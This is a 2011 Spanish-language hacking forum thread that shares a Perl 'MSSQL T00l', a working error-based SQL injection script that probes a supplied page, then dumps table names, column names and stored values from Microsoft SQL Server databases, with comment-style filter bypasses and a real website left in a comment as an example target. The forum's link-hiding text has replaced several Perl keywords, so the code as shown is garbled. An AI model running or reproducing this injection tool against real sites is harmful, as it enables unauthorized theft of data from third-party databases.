comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] MSSQL T00l

  • 1 Respuestas
  • 1417 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 09:47:39 pm »
Bueno , aca les traigo una tool en perl para
buscar tablas y columnas con information_schema en MSSQL
Tambien pueden sacar los valores que quieren de las columnas.

Código: Perl
  1. #!usr/bin/perl
  2. #MSSQL T00l
  3. #(C) Doddy Hackman 2011
  4.  
  5.  
  6. use LWP::UserAgent;
  7. use HTTP::Request::Common;
  8.  
  9. my $nave = LWP::UserAgent->new();
  10. $nave->timeout(13);
  11. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  12.  
  13. sub head {
  14. No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(
  15.  
  16.  @@    @@   @@@@  @@@@   @@@    @@     @@@@@@  @@@      @@@    @@  
  17.  @@@  @@@  @@  @ @@  @  @@@@@   @@       @@   @@@@@    @@@@@   @@  
  18.  @@@  @@@  @@    @@    @@   @@  @@       @@  @@   @@  @@   @@  @@  
  19. @@@@@@@@@@  @@@   @@@  @@   @@  @@       @@  @@   @@  @@   @@  @@  
  20. @@ @@@@ @@    @@    @@ @@ @@@@  @@       @@  @@   @@  @@   @@  @@  
  21. @@  @@  @@ @  @@ @  @@  @@@@@   @@       @@   @@@@@    @@@@@   @@  
  22. @@  @@  @@ @@@@  @@@@    @@@@@  @@@@     @@    @@@      @@@    @@@@
  23.                                                                  
  24.  
  25.  
  26. );
  27. }
  28.  
  29. sub copyright {
  30. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n(C) Doddy Hackman 2011\n\n";
  31. <stdin>;
  32. No tienes permisos para ver links. Registrate o Entra con tu cuenta(1);
  33. }
  34.  
  35. repe();
  36.  
  37. sub repe {
  38.  
  39. No tienes permisos para ver links. Registrate o Entra con tu cuenta("cls");
  40.  
  41.  
  42. head();
  43.  
  44.  
  45. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[Page] : ";
  46. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $page=<stdin>);
  47.  
  48. $code = toma($page);
  49.  
  50. if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) {
  51. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] The page is vulnerable to MSSQL Injection\n\n";
  52. } else {
  53. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[-] Not vulnerable\n\n";
  54. #copyright();
  55. }
  56.  
  57. menu:
  58.  
  59. No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(
  60.  
  61. ##################################
  62.  
  63. 1 - Dump tables
  64. 2 - Dump Columns of the a table
  65. 3 - Dump No tienes permisos para ver links. Registrate o Entra con tu cuenta
  66. 4 - Change target
  67. 5 - Exit
  68.  
  69. ##################################
  70.  
  71.  
  72. );
  73.  
  74. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Opcion] : ";
  75. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $op=<stdin>);
  76.  
  77. if ($op eq 1) {
  78. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[*] Dumping tables...\n\n";
  79. mssql_tables($page);
  80. No tienes permisos para ver links. Registrate o Entra con tu cuenta menu;
  81. }
  82. elsif ($op eq 2) {
  83. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[Table] : ";
  84. No tienes permisos para ver links. Registrate o Entra con tu cuenta (my $tab = <stdin>);
  85. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[*] Dumping columns..\n\n";
  86. mssql_columns($page,$tab);
  87. No tienes permisos para ver links. Registrate o Entra con tu cuenta menu;
  88. }
  89. elsif($op eq 3) {
  90. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[Table] : ";
  91. No tienes permisos para ver links. Registrate o Entra con tu cuenta (my $tab=<stdin>);
  92. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[Column] : ";
  93. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $col=<stdin>);
  94. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[*] Dumping values..\n\n";
  95. mssql_data($page,$tab,$col);
  96. No tienes permisos para ver links. Registrate o Entra con tu cuenta menu;
  97. }
  98. elsif ($op eq 4) {
  99. repe();
  100. }
  101. elsif ($op eq 5) {
  102. copyright();
  103. }
  104. else {
  105. No tienes permisos para ver links. Registrate o Entra con tu cuenta menu;
  106. }
  107.  
  108. #@tables = mssql_tables("http://www.12manage.com/profile.asp?m=drarupbarman'","Users");
  109.  
  110.  
  111. sub mssql_columns {
  112. ($pass1,$pass2) =  bypass("--");
  113. my $sir;
  114. for (1..666) {
  115. $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$_[1]."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
  116. $code = toma($_[0].$path);
  117. if ($code=~/value '(.*?)' to/ig) {
  118. $sir.= ",'".$1."'";
  119. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Column found : $1]\n";
  120. } else {
  121. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Finish\n";
  122. last;
  123. }
  124. }
  125. }
  126.  
  127. sub mssql_tables {
  128. ($pass1,$pass2) =  bypass("--");
  129. my $sir;
  130. for (1..666) {
  131. $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
  132. #print "$path\n";
  133. $code = toma($_[0].$path);
  134. if ($code=~/value '(.*?)' to/ig) {
  135. $sir.= ",'".$1."'";
  136. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Table found : $1]\n";
  137. } else {
  138. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Finish\n";
  139. last;
  140. }
  141. }
  142. }
  143.  
  144. sub mssql_data {
  145. ($pass1,$pass2) =  bypass("--");
  146. my $sir;
  147. for (1..666) {
  148. $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$_[2].$pass1."from".$pass1.$_[1].$pass1."where".$pass1.$_[2].$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
  149. #print "$path\n";
  150. $code = toma($_[0].$path);
  151. if ($code=~/value '(.*?)' to/ig) {
  152. $sir.= ",'".$1."'";
  153. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Data found : $1]\n";
  154. } else {
  155. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Finish\n";
  156. last;
  157. }
  158. }
  159. }
  160. }
  161.  
  162. sub bypass {
  163. if ($_[0] eq "/*") { No tienes permisos para ver links. Registrate o Entra con tu cuenta ("/**/","/*"); }
  164. elsif ($_[0] eq "%20") { No tienes permisos para ver links. Registrate o Entra con tu cuenta ("%20","%00"); }
  165. else {No tienes permisos para ver links. Registrate o Entra con tu cuenta ("+","--");}}
  166.  
  167.  
  168. sub toma {
  169. No tienes permisos para ver links. Registrate o Entra con tu cuenta $nave->request(GET $_[0])->content;
  170. }
  171.  
  172.  
  173. # ¿ The End ?
  174.  


Si lo quieren descargar desde sourceforge

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
https://sourceforge.net/projects/mssqltool/
« Última modificación: Marzo 14, 2015, 10:16:28 am por Expermicid »

Desconectado SPELINAX

  • *
  • Underc0der
  • Mensajes: 25
  • Actividad:
    0%
  • Reputación 0
  • Un clásico carder de los 90's (ci)
    • Ver Perfil
    • YouTube Channel
    • Email
« Respuesta #1 en: Noviembre 22, 2011, 04:45:15 pm »
Gracias haber si me sirve.
[Ð.Ţ.Ρ] [2007] †.: SǷ£ĻΐИΩХ :.† [2007] [Ð.Ţ.Ρ]


 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3243
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1518
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1668
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d
[Perl] Counter Strike 1.6 Servers List

Iniciado por BigBear

Respuestas: 0
Vistas: 1172
Último mensaje Noviembre 12, 2012, 07:32:11 pm
por BigBear
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]

Iniciado por SkillmaX

Respuestas: 0
Vistas: 1403
Último mensaje Julio 04, 2010, 10:14:31 am
por SkillmaX